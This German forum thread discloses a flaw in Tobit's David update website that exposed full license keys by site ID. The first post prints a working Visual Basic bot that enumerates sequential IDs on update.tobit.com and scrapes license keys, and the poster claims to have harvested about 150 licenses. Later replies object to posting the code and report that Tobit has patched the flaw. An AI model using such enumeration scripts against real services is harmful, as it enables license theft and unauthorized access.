Böse Sicherheitslücke in Tobit Website !!

Hallo,

Tobit liest meine Mails nicht:

Zitat

Empfangen: User/GrotenT/System/Spam
Empfangen: Unverteilt/Spam
Empfangen: System/#09#hostmaster@tobit.com/Spam
Verschoben durch Mitarbeiter: Group/#02#Marketing/Backline Marketing/Partner/eleven/Nicht erkannter Spam
Kopiert: Group/#02#Marketing/Backline Marketing/Partner/eleven/Nicht erkannter Spam/old

Also mache ich das ganze doch öffentlich - vielleicht hilft es ja Tobit wachzurütteln... Anhand der Side-ID kann man die komplette Lizenznummer herausfinden:
(probiert's mit Eurer Site-ID einmal aus).

Der Clue: Durch die Update-Seite (einfach mal auf update rechts klicken) findet man die Zusatzlizenzen, über eine andere David-Seite den Lizenznehmer. Kann man auch nicht schlimm finden.

Aber dass Dritte meine David Lizenz upgraden können (hätte für eine gefundene David Lizenz) eines Users etwas mehr als 10.000 Euro gekostet.
Gut, denkt man, dann braucht man nunmal eine Site-ID, die muss man erst einmal haben. Stimmt. Dafür baut man sich halt in Visual Basic einen Bot, der die ganze Linie nach Startlizenzen durchschleift:

[Blockierte Grafik: http://s3.imgimg.de/thumbs/minitool8348e214png.png]

Ist ja auch nix grosses soweit:

Private Sub Command1_Click()
On Error Resume Next
Do
Inet1.Cancel
URL = Inet1.OpenURL("http://update.tobit.com/?" & Text2 & "-" & Text3)
LicenceKey = Split(URL, "updatelicense=")
RealLicence = Split(LicenceKey(1), """")
licence = RealLicence(0)
If Len(licence) > 1 Then
    Text1 = Text1 & licence & vbCrLf
End If
Text3 = Text3 + 1
If Len(Text3) < 5 Then
    Do
        Text3 = "0" & Text3
    Loop Until Len(Text3) >= 5
End If
Loop Until Text3 = 99999
MsgBox "Search done."
End Sub

Hier noch zwei Screenshots:
[Blockierte Grafik: http://s3.imgimg.de/thumbs/screenshot17e45a77dpng.png]

[Blockierte Grafik: http://s3.imgimg.de/thumbs/screenshot20373aedfpng.png]

JETZT denke ich über einen Wechsel nach - dann lieber doch Exchange...

Vielleicht leitet jemand als TAR oder TSP mit Hinweis auf diesem Forenthread das ganze mal an Tobit weiter (ich erwarte für den Hinweis zumindestens einen kleinen Dank - besser: eine NFR-Lizenz vom fx.2011). Hätte es nicht gepostet, wenn Tobit meine Mail gelesen hat, aber damit die Ihre Website mal beheben, machen wir es halt so. Geht ja nicht anders...

P.S: Gefunden habe ich mit dem Bot ca. 150 Lizenzen in 3 Stunden - per Modem - Originale Lizenzen, MIS fähig usw...

Hallo,

Sicherheitslücke hin oder her, aber einen solchen Code sollte man hier nicht öffentlich posten, auch wenn er sicher einfach selbst zu schreiben ist (für die, die sich mit Programmierung auskennen).

Bitte sorge dafür, dass der Quellcode des Programmes hier verschwindet. Ich denke der Hinweis auf die Lücke reicht vollkommen. Tobit kann sich an Dich wenden wenn Sie den Quellcode haben wollen.

Gruß Jens

Tobit hat nachgebessert, man landet nun auf:
Das die Jungens sich nicht einmal zu simplen Buchstaben wie "Danke" durchringen konnten (aber vielleicht liegt's auch in MEINEM Spam Ordner)

Danke an Hr.Baumgartner für den Hinweis. Damit ist es auch egal, ob der Programmiercode noch online ist. Archivieren wir ihn halt.